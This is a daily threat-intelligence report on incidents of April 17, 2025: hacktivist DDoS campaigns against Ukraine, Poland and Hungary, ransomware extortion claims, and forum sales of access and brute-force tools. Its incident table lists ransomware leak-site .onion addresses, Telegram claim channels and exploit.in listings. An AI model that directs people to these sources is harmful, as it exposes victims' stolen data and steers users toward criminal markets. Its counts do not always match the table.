[April-17-2025] Daily Cybersecurity Threat Report

Posted on

1. Introduction

This report provides an analytical overview of the cyber threat landscape as observed through a specific dataset of incidents reported on April 17, 2025. The analysis is enriched by supplementary threat intelligence research concerning the tactics, techniques, procedures (TTPs), and motivations of relevant threat actors and prevalent attack methodologies. The objective is to deliver actionable intelligence for cybersecurity professionals and decision-makers navigating the complex and dynamic threat environment.

The incidents detailed herein occur against a backdrop of significant geopolitical tensions, particularly the ongoing conflicts related to Russia-Ukraine and Israel-Palestine. These conflicts demonstrably fuel hacktivist operations, often manifesting as Distributed Denial-of-Service (DDoS) attacks aimed at disruption and propaganda.1 Concurrently, the financially motivated cybercrime ecosystem, dominated by ransomware, continues to evolve. Ransomware groups increasingly employ sophisticated extortion tactics and leverage a thriving underground market for initial access and specialized tooling.

The scope of this analysis is primarily focused on the incidents logged for April 17, 2025, contextualized by the provided research materials. While representing a snapshot in time, these events illuminate broader trends and persistent threats. Key themes emerging from the data include the high volume of DDoS attacks conducted by pro-Russian hacktivist groups, the diversification of ransomware operations employing double extortion tactics across a global victim base, targeted attacks against specific sectors such as Government Administration and Manufacturing, and the pivotal role of online platforms like Telegram and the Tor network in facilitating threat actor operations.

2. Executive Summary

Cyber threat activity observed on April 17, 2025, was marked by a high tempo of operations, primarily characterized by numerous DDoS attacks attributed to hacktivist groups and multiple, distinct ransomware campaigns targeting organizations globally.

The most prominent threat actors active within this dataset included:

  • NoName057(16): This pro-Russian hacktivist group dominated the DDoS landscape, launching numerous attacks against Ukrainian and Polish entities. Their targets spanned government, defense, manufacturing, chemical, financial, and aviation sectors, consistent with their established geopolitical motivations and focus on disrupting nations supporting Ukraine.1
  • Sarcoma & Qilin: These ransomware groups demonstrated significant activity, primarily targeting organizations within the United States across diverse industries including Real Estate, Manufacturing, Hospitality, and Education. Both groups claimed substantial data exfiltration volumes, underscoring the prevalent double extortion model.4
  • SAFEPAY: This ransomware operation was notably active against German and UK organizations, particularly in the manufacturing sector. Their claims involved large data volumes and featured characteristically short extortion timelines (3-4 days), designed to maximize pressure on victims.7
  • Other Actors: The threat landscape also featured activity from groups including NATION OF SAVIORS (DDoS in Bangladesh), Al Ahad (DDoS against US/Hungarian targets), Space Bears, DragonForce, MEDUSA, RALord (Ransomware across various regions), SECT0R16 (claimed OT access), and initial access vendors like cryptoday and Xirosina operating on underground forums. This diversity highlights a complex ecosystem with multiple actors pursuing varied objectives.

The most prevalent attack types observed were:

  • DDoS: Accounting for the majority of reported incidents, DDoS attacks were largely driven by NoName057(16) against Ukrainian and Polish targets, reflecting the weaponization of cyber disruption in geopolitical conflicts.1 Other groups like NATION OF SAVIORS and Al Ahad also contributed to DDoS activity.
  • Ransomware: A significant number of incidents involved diverse ransomware families (Sarcoma, Qilin, SAFEPAY, Space Bears, DragonForce, MEDUSA, RALord). These operations consistently employed double extortion tactics—encrypting data and threatening to leak exfiltrated sensitive information—targeting a global victim base across numerous sectors.9
  • Initial Access Sales: The data included instances of compromised access credentials and specialized attack tools being offered for sale on underground platforms, indicating an active market that facilitates subsequent cyberattacks.

Victimology analysis revealed Ukraine and Poland as primary targets for DDoS attacks, while the United States and Germany faced significant ransomware activity. Key targeted industries included Government Administration, Manufacturing (including Chemical, Defense, Electronics, Medical Equipment), Aviation & Aerospace, Financial Services/Banking, IT Services, Education, Real Estate, and Hospitality & Tourism.

Key trends underscored by the day’s activity include the strong correlation between DDoS campaigns and geopolitical events, the increasing sophistication and diversification of ransomware TTPs (including the Ransomware-as-a-Service model, double/triple extortion, exploitation of specific CVEs), and the critical operational roles of Telegram (for hacktivist coordination and claims) and the Tor network (for ransomware leak sites and communication).

Strategically, these observations necessitate robust DDoS mitigation capabilities, comprehensive multi-layered ransomware defense strategies (encompassing prevention, detection, and recovery, particularly focusing on data protection), and heightened awareness of the threats posed by the initial access market. Organizations must adopt adaptive security postures to counter these evolving and interconnected threats.

3. Analysis of Observed Incidents (April 17, 2025)

Overview

The cybersecurity incidents reported on April 17, 2025, provide a concentrated snapshot of the broader threat landscape, reflecting ongoing geopolitical cyber conflicts and persistent financially motivated criminal operations. The sheer volume of distinct attacks claimed or executed within this single 24-hour period underscores the high operational tempo maintained by various threat actors. DDoS attacks formed the bulk of the activity, alongside numerous ransomware claims involving significant data exfiltration, and indicators of the supporting underground economy for access and tools.

Breakdown by Attack Category

  • DDoS Attacks:
    Distributed Denial-of-Service attacks constituted the most frequent incident type observed. The pro-Russian hacktivist group NoName057(16) was responsible for the vast majority of these, launching a coordinated campaign against targets in Ukraine and Poland. Victims included government entities (National Agency of Ukraine on Civil Service, Polish Agency for Enterprise Development, Przemyśl Municipal Roads Authority), defense-related organizations (Athlon Avia), manufacturing companies (Tochprylad, PESA Bydgoszcz SA.), aviation and aerospace firms (CESARA TELEMETRY), chemical manufacturers (Grupa Azoty and its subsidiaries Sklep Grupa Azoty, Grupa Azoty Puławy, Inwestor Grupa Azoty), financial services (Getin Holding), and government relations firms (Sparing-Vist Centre). This intense focus on Ukraine and Poland, a key NATO ally and supporter of Ukraine, directly aligns with NoName057(16)’s stated mission to destabilize perceived anti-Russian forces and disrupt support networks for Ukraine in the context of the ongoing war.1 The selection of targets within government, defense, and critical industries like chemical manufacturing and transportation suggests an intent to cause maximum disruption to state functions and economic activity supporting the war effort or perceived adversaries.
    Other hacktivist groups also conducted DDoS attacks. NATION OF SAVIORS targeted several businesses in Bangladesh within the Hospitality & Tourism and Cosmetics sectors (Dhaka luxury spa, Novla thai spa, Allure Spa Premium, Neha Thai Spa). This specific targeting pattern diverges significantly from the typical geopolitical focus seen with groups like NoName057(16). While hacktivism can be driven by various ideologies including social or religious motivations 15, the choice of spa businesses is unusual and might point towards localized grievances, moral policing objectives within Bangladesh, or simply opportunistic targeting by a less sophisticated group. Further observation is required to clarify their specific agenda, which doesn’t align with the major conflict-driven hacktivism trends discussed in available research.2
    The pro-Palestinian hacktivist group Al Ahad claimed responsibility for DDoS attacks against the US-based social media platform 4chan and two Hungarian airports (Győr-Pér International Airport, Budapest Airport). Targeting airports is a common hacktivist tactic aimed at causing disruption and gaining visibility.1 The attack on 4chan could be symbolic, targeting a platform seen as representative of Western online culture, while the attacks on Hungarian targets might relate to Hungary’s perceived political stance or simply represent accessible targets within the broader anti-Western/anti-NATO narrative often associated with pro-Palestinian and allied groups.16
  • Ransomware Attacks:
    Multiple distinct ransomware operations claimed victims on April 17, highlighting the persistent and diverse nature of this threat. These attacks consistently involved claims of significant data exfiltration, reinforcing the double extortion model as standard practice.
  • Sarcoma listed five victims across the USA, Italy, UK, and Taiwan, spanning Real Estate (Kaye Lifestyle Homes, 521GB claimed), Transportation & Logistics (Tralfo, 34GB), Banking & Mortgage (Manchester Credit Union Limited, 6GB), Facilities Services (Schultz Industries, Inc., 61GB), and Arts & Crafts (Ju Percussion Group Foundation, 1.6TB claimed). The extremely large volume claimed from Ju Percussion Group (1.6TB) stands out and could reflect targeting based on data richness or be an inflated figure used for psychological pressure.6 The types of data mentioned (Passport IDs, financial reports, PII) confirm a focus on sensitive information to maximize leverage.4
  • Qilin (Agenda) claimed three US-based victims: Universal Window and Door LLC (Manufacturing, 35GB), Yankee Trails (Hospitality & Tourism, 96GB), and Bertie County Public Schools (Education, 50GB). The data types specified (customer details, payroll, student information including GPAs and IEPs) are highly sensitive, aligning with Qilin’s known double extortion strategy and targeting of critical sectors.5
  • SAFEPAY listed five victims, four in Germany and one in the UK: Stadt Heilbronn (Government Administration, 85GB), Kellermann & Engelhardt ITEC GmbH (Building and construction, 70GB), Heinrich + Steinhardt GmbH (Architecture & Planning, 49GB), Helix Tool (UK, Manufacturing, 239GB), and Hurst + Schröder GmbH (Germany, Manufacturing, 239GB). The concentration of German victims, particularly in manufacturing and related fields, might indicate a specific campaign focus or affiliate preference. SAFEPAY is known for its aggressive, short ransom deadlines (3-4 days mentioned in claims), designed to pressure victims into quick payment.7
  • Space Bears claimed two victims: Evertech Instrumental Co., Ltd. (ETI) (Taiwan, Electrical & Electronic Manufacturing) and Viñuelas Abogados (Spain, Law Practice & Law Firms). They alleged compromise of databases, financial documents, and personal information, with publication threatened in 6-8 days. This aligns with their focus on enterprises and use of double extortion.9
  • DragonForce claimed two US victims: City of Grove (Government Administration, 78.92GB) and Iris ID Systems Inc (Information Technology Services, 204.66GB), with data publication threatened in 5-6 days. This demonstrates their global reach and targeting beyond initial geopolitical motivations.12
  • MEDUSA claimed Lithium Americas Corp. (Canada, Mining/Metals) as a victim, threatening data publication in 8-9 days and providing sample screenshots. This fits their pattern of targeting large organizations in critical sectors using double extortion.10
  • RALord, a relatively new group 11, claimed Bio-Clima Service Srl (Italy, Medical Equipment Manufacturing) with 50GB of data allegedly exfiltrated and a 7-8 day deadline. This adds another European victim to their early, likely opportunistic, targeting.11

The diversity of active groups, many operating under a Ransomware-as-a-Service (RaaS) model 5, fuels this widespread threat. The consistent claims of specific, sensitive data theft (financial records, PII, intellectual property, student/client data) across nearly all ransomware incidents confirm that data exfiltration is integral to the modern ransomware playbook, used to exert maximum pressure beyond mere operational disruption from encryption.5

  • Initial Access & Alert:
    Incidents related to the cybercrime supply chain were also observed. The threat actor ‘cryptoday’ advertised the sale of administrative access to an unidentified US organization’s WordPress WooCommerce shop via the exploit[.]in forum. Such access provides a direct pathway for financial fraud, data theft, or deployment of further malware like ransomware onto e-commerce platforms. Another actor, ‘Xirosina’, advertised corporate access checker and brute-force software on the same forum, designed to target common enterprise entry points like VPNs, ADFS, Citrix, CPanel, RDWeb, and OWA, with features like proxy support to evade detection. This highlights the market for tools that automate the initial stages of network compromise. Additionally, the hacktivist group SECT0R16, reportedly aided by OverFlame, claimed access to the heating system of Palazzo Raja in Italy. While seemingly minor, this claim aligns with SECT0R16’s documented focus on Operational Technology (OT) and Industrial Control Systems (ICS), potentially representing a demonstration of capability or an opportunistic intrusion into building automation systems.19 These incidents underscore the importance of the underground market in providing the access and tools that enable larger-scale attacks.

Victim Analysis

  • Geographic Distribution: The geographic spread of victims on April 17 reflects the different motivations driving threat activity. DDoS attacks were heavily concentrated in Ukraine and Poland, directly linked to the geopolitical activities of NoName057(16).1 Hungary and Bangladesh also experienced DDoS attacks from Al Ahad and NATION OF SAVIORS respectively. Ransomware victims were more globally distributed, with a significant number in the USA (targeted by Sarcoma, Qilin, DragonForce). European nations including Germany (SAFEPAY), Italy (Sarcoma, RALord, SECT0R16 claim), the UK (Sarcoma, SAFEPAY), and Spain (Space Bears) were also hit. Taiwan (Sarcoma, Space Bears) and Canada (MEDUSA) rounded out the ransomware victim list. This pattern suggests geopolitical factors dictate DDoS targeting, while financial motives drive ransomware groups to target organizations across developed economies perceived as having the capacity to pay ransoms.
  • Targeted Industry Sectors: A wide range of industries were impacted. Government Administration was heavily targeted by DDoS (Ukraine, Poland) and also ransomware (USA, Germany). Manufacturing was a prominent target for both DDoS (Ukraine, Poland) and ransomware (USA, Germany, UK, Taiwan, Italy), including sub-sectors like Chemical Manufacturing, Defense & Space, Electrical & Electronic Manufacturing, and Medical Equipment Manufacturing. Aviation & Aerospace (Ukraine, Hungary) and Financial Services/Banking (Poland, UK) were also hit by DDoS and ransomware respectively. Other impacted sectors included IT Services (USA), Education (USA), Real Estate (USA), Hospitality & Tourism (USA, Bangladesh), Transportation & Logistics (Italy), Facilities Services (USA), Arts & Crafts (Taiwan), Law Practice (Spain), Mining/Metals (Canada), Building and Construction (Germany), Architecture & Planning (Germany), Social Media (USA), and Cosmetics (Bangladesh). The targeting of government, defense, and critical manufacturing aligns with strategic disruption goals often seen in geopolitical conflicts. The broad range of sectors hit by ransomware indicates largely opportunistic targeting driven by financial motives, focusing on organizations across various industries based on vulnerability assessments and perceived ability to pay, rather than a strict industry focus for most groups.

Threat Actor Communication & Operations Platforms

The platforms used by threat actors on April 17 align closely with their operational needs and objectives:

  • Telegram: This platform was the primary communication channel for hacktivist groups observed in the dataset, including NoName057(16), NATION OF SAVIORS, Al Ahad, and SECT0R16. They used it to publicly claim responsibility for attacks, disseminate propaganda, share proof-of-downtime links (check-host.net reports), and potentially coordinate activities.1 The continued reliance on Telegram, even by groups like Al Ahad who previously announced intentions to migrate due to privacy concerns 17, underscores its effectiveness for reaching audiences and maintaining operational tempo within the hacktivist community.17
  • Tor Network: The Tor network was exclusively used by the ransomware groups (Sarcoma, Qilin, SAFEPAY, Space Bears, DragonForce, MEDUSA, RALord) to host their Data Leak Sites (DLS) and potentially for negotiation portals. This provides the necessary anonymity for conducting illicit activities like publishing stolen data and demanding ransom payments.5
  • Openweb Forums: Specific underground forums accessible on the open web, such as exploit[.]in, served as marketplaces for actors like ‘cryptoday’ and ‘Xirosina’ to advertise and sell compromised initial access credentials and specialized hacking tools.

This clear segmentation of platform usage—public-facing Telegram for hacktivist visibility, anonymized Tor for ransomware infrastructure, and specific forums for illicit commerce—reflects the distinct operational requirements of different types of threat actors.

Table 1: Summary of Observed Incidents (April 17, 2025)

Date (UTC)CategoryThreat ActorVictim OrganizationVictim CountryVictim IndustryVictim SiteNetworkSummary / ClaimPublished URLScreenshots
2025-04-17T12:20DDoS AttackNoName057(16)Cesara TelemetryUkraineAviation & Aerospacechezara-telemetria.comtelegramClaimed DDoS attack, provided proof link.https://t.me/nnm05716rus/588https://d34iuop8pidsy8.cloudfront.net/be7752b1-0b75-4cc9-a03e-ca739fbfcf5b.png, https://d34iuop8pidsy8.cloudfront.net/2e9ebd72-925e-4fd9-be14-1c187bc5d432.png
2025-04-17T12:13DDoS AttackNoName057(16)TochpryladUkraineManufacturingtochprilad.comtelegramClaimed DDoS attack, provided proof link.https://t.me/nnm05716rus/588https://d34iuop8pidsy8.cloudfront.net/c5b1bda3-5ddf-4510-b76a-e9e205254968.png, https://d34iuop8pidsy8.cloudfront.net/1dfa8992-fd4d-4057-ab00-adb23631fadd.png
2025-04-17T12:13RansomwareSarcomaKaye Lifestyle HomesUSAReal Estatekayelifestylehomes.comtorClaimed 521GB data exfiltrated (Passport IDs, Budget Reports, etc.). Intent to publish in 6-7 days.http://sarcomawmawlhov7o5mdhz4eszxxlkyaoiyiy2b5iwxnds2dmb4jakad.onion/https://d34iuop8pidsy8.cloudfront.net/46e0bf31-f64f-4a3e-b82f-4bba8147b028.png, https://d34iuop8pidsy8.cloudfront.net/d8381070-7cea-442d-9695-ffdef48f0a90.png
2025-04-17T12:10DDoS AttackNoName057(16)National Agency of Ukraine on Civil ServiceUkraineGovernment Administrationnads.gov.uatelegramClaimed DDoS attack, provided proof link.https://t.me/nnm05716rus/588https://d34iuop8pidsy8.cloudfront.net/3494cde5-c220-4433-a9c2-c4f20baebd4b.png
2025-04-17T12:07DDoS AttackNoName057(16)Athlon AviaUkraineDefense & Spaceathlonavia.comtelegramClaimed DDoS attack, provided proof link.https://t.me/nnm05716rus/588https://d34iuop8pidsy8.cloudfront.net/c5d41a3c-a733-4e71-80d4-ea82ec61bd28.png
2025-04-17T12:06DDoS AttackNoName057(16)Sparing-Vist CentreUkraineGovernment Relationssparing-vist.uatelegramClaimed DDoS attack, provided proof link.https://t.me/nnm05716rus/588https://d34iuop8pidsy8.cloudfront.net/5bb8d062-e0bf-466a-9bfd-82e0c1e5411c.png, https://d34iuop8pidsy8.cloudfront.net/fbfca9be-4429-4b85-b39a-46bf336870c9.png
2025-04-17T11:00RansomwareQilinUniversal Window and Door LLCUSAManufacturinguniversalwindow.comtorClaimed 35GB data exfiltrated (Customer details, payroll, quotes, etc.).http://ijzn3sicrcy7guixkzjkib4ukbiilwc3xhnmby4mcbccnsd7j2rekvqd.onion/site/view?uuid=fd08719c-202e-3d69-9606-f05fae8ba478https://d34iuop8pidsy8.cloudfront.net/4b71aa4b-c41c-4d63-a61e-3d577e38e9b9.png
2025-04-17T10:41DDoS AttackNoName057(16)Grupa AzotyPolandChemical Manufacturinggrupaazoty.comtelegramClaimed DDoS attack, provided proof link.https://t.me/nnm05716rus/585https://d34iuop8pidsy8.cloudfront.net/27bf3b97-5638-4149-a51a-a3c377284e7e.png, https://d34iuop8pidsy8.cloudfront.net/a0931a17-4ff5-480d-8efe-1462fc906c32.png
2025-04-17T10:35DDoS AttackNoName057(16)Getin HoldingPolandFinancial Servicesgetin.pltelegramClaimed DDoS attack, provided proof link.https://t.me/nnm05716rus/585https://d34iuop8pidsy8.cloudfront.net/d75f3b00-f5a8-46cb-8681-1a8c516237f6.png, https://d34iuop8pidsy8.cloudfront.net/c097945f-f62f-4395-9079-0e3906aa4e9b.png
2025-04-17T10:31RansomwareQilinYankee TrailsUSAHospitality & Tourismyankeetrails.comtorClaimed 96GB data exfiltrated (Passport, credit card forms, etc.).http://ijzn3sicrcy7guixkzjkib4ukbiilwc3xhnmby4mcbccnsd7j2rekvqd.onion/site/view?uuid=81b360b5-1927-3938-89e6-1b7ff0c6c5a3https://d34iuop8pidsy8.cloudfront.net/4b9508a5-4bfc-4886-b4fe-c0c24f1b94fe.png
2025-04-17T10:29DDoS AttackNoName057(16)Polish Agency for Enterprise Development (PARP)PolandGovernment Administrationen.parp.gov.pltelegramClaimed DDoS attack, provided proof link.https://t.me/nnm05716rus/585https://d34iuop8pidsy8.cloudfront.net/aedd6c30-06c6-48bb-86fb-a9dc71df9182.png, https://d34iuop8pidsy8.cloudfront.net/6ddc128a-80d5-467f-8a8f-3320466aa1b4.png
2025-04-17T10:23DDoS AttackNoName057(16)Przemyśl Municipal Roads AuthorityPolandGovernment Administrationzdm-przemysl.comtelegramClaimed DDoS attack, provided proof link.https://t.me/nnm05716rus/585https://d34iuop8pidsy8.cloudfront.net/d3f1390d-f437-4dc0-8aba-534b67c410e0.png, https://d34iuop8pidsy8.cloudfront.net/5b79b785-95c0-4b3c-a081-5a0ec9983818.png
2025-04-17T10:20RansomwareQilinBertie County Public SchoolsUSAEducationbertie.k12.nc.ustorClaimed 50GB data exfiltrated (Contracts, student PII, GPA, IEPs, etc.).http://ijzn3sicrcy7guixkzjkib4ukbiilwc3xhnmby4mcbccnsd7j2rekvqd.onion/site/view?uuid=b8592709-99e2-30a6-95b7-61fd4949837dhttps://d34iuop8pidsy8.cloudfront.net/1a0211b7-51b8-4cd0-b783-2f9b1fe74a47.png
2025-04-17T10:12DDoS AttackNoName057(16)PESA Bydgoszcz SA.PolandManufacturingpesa.pltelegramClaimed DDoS attack, provided proof link.https://t.me/nnm05716rus/585https://d34iuop8pidsy8.cloudfront.net/13ea9e96-dbd0-497f-bdcd-6c50f0ce6b84.png, https://d34iuop8pidsy8.cloudfront.net/f6197152-eea2-4733-89ca-99106ec24e3c.png
2025-04-17T09:56DDoS AttackNoName057(16)Sklep Grupa AzotyPolandChemical Manufacturingsklep.grupaazoty.comtelegramClaimed DDoS attack, provided proof link.https://t.me/nnm05716rus/585https://d34iuop8pidsy8.cloudfront.net/f5b7d786-6e8e-48ef-a664-11b42c5a6622.png
2025-04-17T09:52DDoS AttackNoName057(16)Grupa Azoty PuławyPolandChemical Manufacturingpulawy.grupaazoty.comtelegramClaimed DDoS attack, provided proof link.https://t.me/nnm05716rus/585https://d34iuop8pidsy8.cloudfront.net/6d27caa2-a568-49cc-b830-d2041872604e.png
2025-04-17T09:45DDoS AttackNoName057(16)Inwestor Grupa AzotyPolandChemical Manufacturinginwestor.grupaazoty.comtelegramClaimed DDoS attack, provided proof link.https://t.me/nnm05716rus/585https://d34iuop8pidsy8.cloudfront.net/931aa8a2-41c6-42da-8c93-099610863cfc.png
2025-04-17T09:42RansomwareSarcomaTralfoItalyTransportation & Logisticstralfo.comtorClaimed 34GB data exfiltrated (ID cards, transport confirmations, etc.). Intent to publish in 6-7 days.http://sarcomawmawlhov7o5mdhz4eszxxlkyaoiyiy2b5iwxnds2dmb4jakad.onion/https://d34iuop8pidsy8.cloudfront.net/85bdeaa8-9584-41da-b839-778e8752a02f.png
2025-04-17T09:41RansomwareSarcomaManchester Credit Union LimitedUKBanking & Mortgagemanchestercreditunion.co.uktorClaimed 6GB data exfiltrated (IDs, financial reports, PII, etc.). Intent to publish in 7-8 days.http://sarcomawmawlhov7o5mdhz4eszxxlkyaoiyiy2b5iwxnds2dmb4jakad.onion/https://d34iuop8pidsy8.cloudfront.net/772e350a-39b0-414d-8a9e-c5b49a7def62.png
2025-04-17T09:22RansomwareSarcomaSchultz Industries, Inc.USAFacilities Servicesschultzindustries.comtorClaimed 61GB data exfiltrated (Claim/payment info, etc.). Intent to publish in 6-7 days.http://sarcomawmawlhov7o5mdhz4eszxxlkyaoiyiy2b5iwxnds2dmb4jakad.onion/https://d34iuop8pidsy8.cloudfront.net/30531888-d6e0-43b4-8cfa-57458008c7ca.png
2025-04-17T08:47RansomwareSarcomaJu Percussion Group FoundationTaiwanArts & Craftsjpg.org.twtorClaimed 1.6TB data exfiltrated (National IDs, insurance reports, PII, etc.). Intent to publish in 8-9 days.http://sarcomawmawlhov7o5mdhz4eszxxlkyaoiyiy2b5iwxnds2dmb4jakad.onion/https://d34iuop8pidsy8.cloudfront.net/a8bc4acf-2fcf-4f99-85a6-f03eff212adf.png
2025-04-17T06:13Initial AccesscryptodayUnidentified USA OrganizationUSANot specifiedNot specifiedopenwebClaimed sale of admin WP WooCommerce shop access.https://forum.exploit.in/topic/257546/https://d34iuop8pidsy8.cloudfront.net/2b8c1073-0212-4713-abb7-62bf4960d84c.png
2025-04-17T06:10DDoS AttackNATION OF SAVIORSDhaka luxury spaBangladeshHospitality & Tourismdhakaluxuryspa.comtelegramClaimed DDoS attack, provided proof link.https://t.me/c/2259100562/275https://d34iuop8pidsy8.cloudfront.net/aa9d06e0-e54e-4498-be70-643efa6dc24e.jpg
2025-04-17T06:10DDoS AttackNATION OF SAVIORSNovla thai spaBangladeshHospitality & Tourismnovlathaispa.comtelegramClaimed DDoS attack, provided proof link.https://t.me/c/2259100562/275https://d34iuop8pidsy8.cloudfront.net/3ccd0c00-f2fb-49f9-8013-57bce6809991.jpg
2025-04-17T06:10DDoS AttackNATION OF SAVIORSAllure Spa PremiumBangladeshCosmeticsallurespabd.comtelegramClaimed DDoS attack, provided proof link.https://t.me/c/2259100562/275https://d34iuop8pidsy8.cloudfront.net/b16fb9a4-bf5f-4df8-be92-9a83870517b5.png
2025-04-17T06:09DDoS AttackNATION OF SAVIORSNeha Thai SpaBangladeshCosmeticsnehathaispa.comtelegramClaimed DDoS attack, provided proof link.https://t.me/c/2259100562/275https://d34iuop8pidsy8.cloudfront.net/83f62ce0-cf8e-4c14-8fa2-97cfca0f9701.png
2025-04-17T05:25AlertXirosinaNot applicableN/AN/AN/AopenwebClaimed sale of corporate access checker/brute-force software (VPNs, Web Panels, OWA).https://forum.exploit.in/topic/257544/https://d34iuop8pidsy8.cloudfront.net/5ac22bdb-c34c-4e9a-8530-6f85f8f97886.png
2025-04-17T05:23RansomwareSpace BearsEvertech Instrumental Co., Ltd. (ETI)TaiwanElectrical & Electronic Mfg.en.evertech.com.twtorClaimed compromise, obtaining databases, financial docs, PII. Intent to publish in 6-7 days.http://5butbkrljkaorg5maepuca25oma7eiwo6a2rlhvkblb4v6mf3ki2ovid.onion/companies/69/evertech-instrumental-co-ltdhttps://d34iuop8pidsy8.cloudfront.net/60c111e9-0b56-425e-b458-a82d00d0c9eb.png
2025-04-17T04:03DDoS AttackAl Ahad4chanUSASocial Media & Online Networking4chan.orgtelegramClaimed DDoS attack, provided proof link.https://t.me/qayzerowns/111https://d34iuop8pidsy8.cloudfront.net/f6c2d4e1-97cc-47f9-9b6d-a5638d1d1064.png, https://d34iuop8pidsy8.cloudfront.net/276cb26a-8d51-4e97-ae22-e09667cf7c7c.png
2025-04-17T03:10DDoS AttackAl AhadGyőr-Pér International AirportHungaryAirlines & Aviationgyor-perairport.hutelegramClaimed DDoS attack, provided proof link.https://t.me/qayzerowns/109https://d34iuop8pidsy8.cloudfront.net/1347cf73-e8fc-4d78-b77e-1390b888926e.png
2025-04-17T03:03DDoS AttackAl AhadBudapest AirportHungaryAviation & Aerospacebud.hutelegramClaimed DDoS attack, provided proof link.https://t.me/qayzerowns/109https://d34iuop8pidsy8.cloudfront.net/fc14fc41-a70f-4ca8-84dc-6c137865b0ff.png
2025-04-17T02:59RansomwareRALordBio-Clima Service SrlItalyMedical Equipment Manufacturingbioclimaservice.ittorClaimed 50GB data exfiltrated. Intent to publish in 7-8 days.http://ralord3htj7v2dkavss2hjzviviwgsf4anfdnihn5qcjl6eb5if3cuqd.onion/bioclimaservice/https://d34iuop8pidsy8.cloudfront.net/01866048-defb-42fb-8144-ba27b7fd31d9.png
2025-04-17T02:42Initial AccessSECT0R16 (OverFlame)Palazzo RajaItalyEvents Servicespalazzoraja.comtelegramClaimed access to heating system.https://t.me/SECTOR1616/80https://d34iuop8pidsy8.cloudfront.net/c7db24bd-d8cb-4d71-84a3-920a847e3e8d.png
2025-04-17T02:22RansomwareSpace BearsViñuelas AbogadosSpainLaw Practice & Law Firmsviñuelasabogados.estorClaimed compromise, obtaining client legal info, financial docs, PII. Intent to publish in 7-8 days.http://5butbkrljkaorg5maepuca25oma7eiwo6a2rlhvkblb4v6mf3ki2ovid.onion/companies/68/vinuelas-abogadoshttps://d34iuop8pidsy8.cloudfront.net/af37a5e3-2e31-4dff-9c0c-178d40ab9916.png
2025-04-17T01:49RansomwareDragonForceCity of GroveUSAGovernment Administrationcityofgroveok.govtorClaimed 78.92GB data exfiltrated. Intent to publish in 5-6 days.http://z3wqggtxft7id3ibr7srivv5gjof5fwg76slewnzwwakjuf3nlhukdid.onion/bloghttps://d34iuop8pidsy8.cloudfront.net/029c1e7a-3bbd-4a17-8f69-fb67a605d2bd.png
2025-04-17T01:44RansomwareDragonForceIris ID Systems IncUSAInformation Technology (IT) Servicesirisid.comtorClaimed 204.66GB data exfiltrated. Intent to publish in 5-6 days.http://z3wqggtxft7id3ibr7srivv5gjof5fwg76slewnzwwakjuf3nlhukdid.onion/bloghttps://d34iuop8pidsy8.cloudfront.net/540734b6-dcc0-4abf-afbb-6a87c09a7460.png
2025-04-17T01:25RansomwareMEDUSALithium Americas Corp.CanadaMining/Metalslithiumamericas.comtorClaimed compromise, data obtained (volume unspecified). Intent to publish in 8-9 days. Sample screenshots available.http://xfv4jzckytb4g3ckwemcny3ihv4i5p4lqzdpi624cxisu35my5fwi5qd.onion/detail?id=dd71a1d456e3d42c9c8c57a250c12f22https://d34iuop8pidsy8.cloudfront.net/eee48941-85a7-469b-a997-3a3a3b038362.png
2025-04-17T01:22RansomwareSAFEPAYStadt HeilbronnGermanyGovernment Administrationheilbronn.detorClaimed 85GB data exfiltrated. Intent to publish in 3-4 days.http://nz4z6ruzcekriti5cjjiiylzvrmysyqwibxztk6voem4trtx7gstpjid.onion/#heilbronnhttps://d34iuop8pidsy8.cloudfront.net/7cf32e94-4e71-4475-86a3-47a35bc005cb.png
2025-04-17T01:16RansomwareSAFEPAYKellermann & Engelhardt ITEC GmbHGermanyBuilding and constructionitec-gmbh.comtorClaimed 70GB data exfiltrated. (No publication timeline mentioned in input).http://nz4z6ruzcekriti5cjjiiylzvrmysyqwibxztk6voem4trtx7gstpjid.onion/#itechttps://d34iuop8pidsy8.cloudfront.net/c1054547-b95e-46c8-84c5-5ae525ebfbd8.png
2025-04-17T01:02RansomwareSAFEPAYHeinrich + Steinhardt GmbHGermanyArchitecture & Planningheinrich-steinhardt.detorClaimed 49GB data exfiltrated. Intent to publish in 3-4 days.http://nz4z6ruzcekriti5cjjiiylzvrmysyqwibxztk6voem4trtx7gstpjid.onion/#heinrichhttps://d34iuop8pidsy8.cloudfront.net/67578237-9657-461d-95b1-472ae2fc4e94.png
2025-04-17T00:57RansomwareSAFEPAYHelix ToolUKManufacturinghelixtools.co.uktorClaimed 239GB data exfiltrated. Intent to publish in 3-4 days.http://nz4z6ruzcekriti5cjjiiylzvrmysyqwibxztk6voem4trtx7gstpjid.onion/#helixtoolshttps://d34iuop8pidsy8.cloudfront.net/5663b5b4-9545-471c-b7c2-dc2e3cd14f9f.png
2025-04-17T00:54RansomwareSAFEPAYHurst + Schröder GmbHGermanyManufacturinghurst-schroeder.detorClaimed 239GB data exfiltrated. Intent to publish in 3-4 days.http://nz4z6ruzcekriti5cjjiiylzvrmysyqwibxztk6voem4trtx7gstpjid.onion/#hurst-schroederhttps://d34iuop8pidsy8.cloudfront.net/4372b10d-e570-4bfe-b9a6-d785a470d560.png
2025-04-17T00:46DDoS AttackAl AhadGovernment of HungaryHungaryGovernment Administrationkormany.hutelegramClaimed DDoS attack, provided proof link.https://t.me/qayzerowns/108https://d34iuop8pidsy8.cloudfront.net/7edac5f6-a218-4858-a9f8-bb4992bb78d5.png
2025-04-17T00:21DDoS AttackDark Storm TeamBreachForumsUSAComputer & Network Securitybreachforums.sttelegramClaimed DDoS attack, provided proof links.https://t.me/DarkStormTeam3/312https://d34iuop8pidsy8.cloudfront.net/e87d4758-890b-4352-bcea-84710af36255.png
2025-04-17T00:16RansomwareSAFEPAYExtreme Fire SolutionsAustraliaBuilding and constructionextremefire.com.autorClaimed 47GB data exfiltrated.http://nz4z6ruzcekriti5cjjiiylzvrmysyqwibxztk6voem4trtx7gstpjid.onion/#extremefirehttps://d34iuop8pidsy8.cloudfront.net/841ad567-c496-43a7-903c-eee8d7919b8e.png
2025-04-17T00:13RansomwareSAFEPAYEichele BauunternehmungGermanyBuilding and constructioneichele-bau.detorClaimed 91GB data exfiltrated.http://nz4z6ruzcekriti5cjjiiylzvrmysyqwibxztk6voem4trtx7gstpjid.onion/#eichelehttps://d34iuop8pidsy8.cloudfront.net/e878aea0-2403-412b-a781-1b1cc52fbf62.png
